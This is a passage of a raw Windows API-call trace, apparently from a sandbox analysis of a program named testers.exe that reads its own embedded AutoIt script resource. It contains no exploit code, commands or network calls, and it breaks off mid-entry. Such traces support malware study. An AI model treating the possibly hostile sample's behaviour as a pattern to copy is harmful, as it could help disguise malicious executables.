HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b3288 | out: hHeap=0x8a0000) returned 1 [0150.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8bfb48 [0150.445] GetCurrentProcess () returned 0xffffffff [0150.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x89fdf0 | out: Wow64Process=0x89fdf0) returned 1 [0150.445] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0150.446] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0150.446] GetNativeSystemInfo (in: lpSystemInfo=0x89fdbc | out: lpSystemInfo=0x89fdbc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0150.446] FreeLibrary (hLibModule=0x75990000) returned 1 [0150.446] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8b3288 [0150.446] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32a0 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c3fc0 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32b8 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c3fd0 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32d0 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c3fe0 [0150.447] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32e8 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c3ff0 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3300 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c4000 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3318 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5010 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3330 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5038 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3348 [0150.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5048 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3360 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5058 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3378 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5068 [0150.448] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0150.448] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0150.448] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0150.448] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0150.448] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0150.448] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b3390 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5078 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5438 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5088 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5450 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5098 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5468 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c50a8 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5480 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c50b8 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5498 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c50c8 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c54b0 [0150.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c50d8 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c54c8 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c50e8 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c54e0 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c50f8 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c54f8 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5108 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5118 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5510 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5128 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5528 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5138 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5540 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5148 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5558 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5158 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5570 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5168 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5178 [0150.449] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5588 [0150.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5188 [0150.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8b2210 [0150.450] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.450] OleInitialize (pvReserved=0x0) returned 0x0 [0150.460] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c55a0 [0150.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c51a8 [0150.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x89fdc4 | out: phkResult=0x89fdc4*=0xf8) returned 0x0 [0150.460] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x89fde0, lpcbData=0x89fdc8*=0x8 | out: lpType=0x0, lpData=0x89fde0*=0x30, lpcbData=0x89fdc8*=0x4) returned 0x0 [0150.460] RegCloseKey (hKey=0xf8) returned 0x0 [0150.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6318 [0150.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c51b8 [0150.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c51c8 [0150.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c51d8 [0150.461] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c55d0 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c51e8 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6340 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c51f8 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c55e8 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5208 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5600 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5218 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5618 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5228 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5630 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5238 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5648 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5248 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5660 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5258 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5678 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5268 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5690 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5278 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c56a8 [0150.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5288 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c56c0 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5298 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c56d8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c52a8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c56f0 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c52b8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5708 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c52c8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5720 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c52d8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5738 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c52e8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5750 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c52f8 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5768 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5308 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5780 [0150.462] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5318 [0150.462] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.463] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5798 [0150.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5328 [0150.466] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x87fd98, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0150.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x8ca500 [0150.466] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5338 [0150.468] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x86fd88, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0150.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5798 | out: hHeap=0x8a0000) returned 1 [0150.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x8ca558 [0150.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca500 | out: hHeap=0x8a0000) returned 1 [0150.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5338 | out: hHeap=0x8a0000) returned 1 [0150.468] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x87fda4, lpFilePart=0x88fda4 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x88fda4*="testers.exe") returned 0x20 [0150.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6368 [0150.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c5798 [0150.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c57b0 [0150.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5338 [0150.468] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x88fdc0 | out: phkResult=0x88fdc0*=0x0) returned 0x2 [0150.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c57b0 | out: hHeap=0x8a0000) returned 1 [0150.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5338 | out: hHeap=0x8a0000) returned 1 [0150.469] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.469] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.469] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c57b0 [0150.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5338 [0150.470] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.521] IsThemeActive () returned 0x1 [0150.522] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x89fde4, fWinIni=0x0 | out: pvParam=0x89fde4) returned 1 [0150.522] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0150.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c57c8 [0150.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5348 [0150.522] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x88fdb8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0150.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c57e0 [0150.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5358 [0150.522] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x86fd18, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0150.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x8ca500 [0150.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5368 [0150.525] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x85fd08, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0150.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b32d0 | out: hHeap=0x8a0000) returned 1 [0150.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x8ca5b0 [0150.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca500 | out: hHeap=0x8a0000) returned 1 [0150.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5368 | out: hHeap=0x8a0000) returned 1 [0150.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8b2258 [0150.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5368 [0150.525] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0150.525] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0150.525] Wow64DisableWow64FsRedirection (in: OldValue=0x87fd1c | out: OldValue=0x87fd1c*=0x0) returned 1 [0150.525] FreeLibrary (hLibModule=0x75990000) returned 1 [0150.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8ca500 [0150.526] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x87fbb8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0150.526] GetFileType (hFile=0xf8) returned 0x1 [0150.526] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0150.526] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0150.527] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0150.527] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0150.527] FreeLibrary (hLibModule=0x75990000) returned 1 [0150.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x8ca608 [0150.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5378 [0150.529] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x87fd78 | out: ppstm=0x87fd78*=0x8c63b8) returned 0x0 [0150.530] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0150.530] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0150.530] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0150.530] LockResource (hResData=0x3607b8) returned 0x3607b8 [0150.530] ISequentialStream:RemoteWrite (in: This=0x8c63b8, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0150.531] IStream:RemoteSeek (in: This=0x8c63b8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0150.531] IStream:RemoteSeek (in: This=0x8c63b8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.531] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x8ca608, cb=0x18, pcbRead=0x87fca4 | out: pv=0x8ca608*=0xa3, pcbRead=0x87fca4*=0x18) returned 0x0 [0150.531] IStream:RemoteSeek (in: This=0x8c63b8, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0150.531] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87fce8, cb=0x4, pcbRead=0x87fca4 | out: pv=0x87fce8*=0x45, pcbRead=0x87fca4*=0x4) returned 0x0 [0150.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5378 | out: hHeap=0x8a0000) returned 1 [0150.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca608 | out: hHeap=0x8a0000) returned 1 [0150.531] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87fd0c, cb=0x10, pcbRead=0x87fce4 | out: pv=0x87fd0c*=0x4d, pcbRead=0x87fce4*=0x10) returned 0x0 [0150.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87fbe0 | out: lpSystemTimeAsFileTime=0x87fbe0*(dwLowDateTime=0x8307a0, dwHighDateTime=0x1d661be)) [0150.532] IStream:RemoteSeek (in: This=0x8c63b8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.532] IStream:RemoteSeek (in: This=0x8c63b8, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87f660, cb=0x4, pcbRead=0x87f424 | out: pv=0x87f660*=0x6b, pcbRead=0x87f424*=0x4) returned 0x0 [0150.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f320 | out: lpSystemTimeAsFileTime=0x87f320*(dwLowDateTime=0x8307a0, dwHighDateTime=0x1d661be)) [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87f668, cb=0x4, pcbRead=0x87f424 | out: pv=0x87f668*=0xa6, pcbRead=0x87f424*=0x4) returned 0x0 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87f450, cb=0x34, pcbRead=0x87f424 | out: pv=0x87f450*=0xe1, pcbRead=0x87f424*=0x34) returned 0x0 [0150.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f320 | out: lpSystemTimeAsFileTime=0x87f320*(dwLowDateTime=0x8307a0, dwHighDateTime=0x1d661be)) [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87f668, cb=0x4, pcbRead=0x87f424 | out: pv=0x87f668*=0x17, pcbRead=0x87f424*=0x4) returned 0x0 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87f694, cb=0x6e, pcbRead=0x87f424 | out: pv=0x87f694*=0xf9, pcbRead=0x87f424*=0x6e) returned 0x0 [0150.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f320 | out: lpSystemTimeAsFileTime=0x87f320*(dwLowDateTime=0x8307a0, dwHighDateTime=0x1d661be)) [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87fd1b, cb=0x1, pcbRead=0x87f66c | out: pv=0x87fd1b*=0x0, pcbRead=0x87f66c*=0x1) returned 0x0 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87fd14, cb=0x4, pcbRead=0x87f66c | out: pv=0x87fd14*=0xbc, pcbRead=0x87f66c*=0x4) returned 0x0 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87fd14, cb=0x4, pcbRead=0x87f66c | out: pv=0x87fd14*=0xbc, pcbRead=0x87f66c*=0x4) returned 0x0 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x87fd14, cb=0x4, pcbRead=0x87f66c | out: pv=0x87fd14*=0x84, pcbRead=0x87f66c*=0x4) returned 0x0 [0150.532] IStream:RemoteSeek (in: This=0x8c63b8, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8c5378 [0150.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8c5388 [0150.532] ISequentialStream:RemoteRead (in: This=0x8c63b8, pv=0x8c5388, cb=0x0, pcbRead=0x87f66c | out: pv=0x8c5388*=0x6e, pcbRead=0x87f66c*=0x0) returned 0x0 [0150.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x87f568 | out: lpSystemTimeAsFileTime=0x87f568*(dwLowDateTime=0x8307a0, dwHighDateTime=0x1d661be)) [0150.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5378 | out: hHeap=0x8a0000) returned 1 [0150.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5388 | out: hHeap=0x8a0000) returned 1 [0150.532] CloseHandle (hObject=0xf8) returned 1 [0150.533] IUnknown:Release (This=0x8c63b8) returned 0x0 [0150.533] FreeLibrary (hLibModule=0x290000) returned 1 [0150.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b2258 | out: hHeap=0x8a0000) returned 1 [0150.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5368 | out: hHeap=0x8a0000) returned 1 [0150.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b32a0 | out: hHeap=0x8a0000) returned 1 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x8ca608 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32a0 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c63b8 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5368 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c63e0 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32d0 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5388 [0150.533] HeapFree (in: 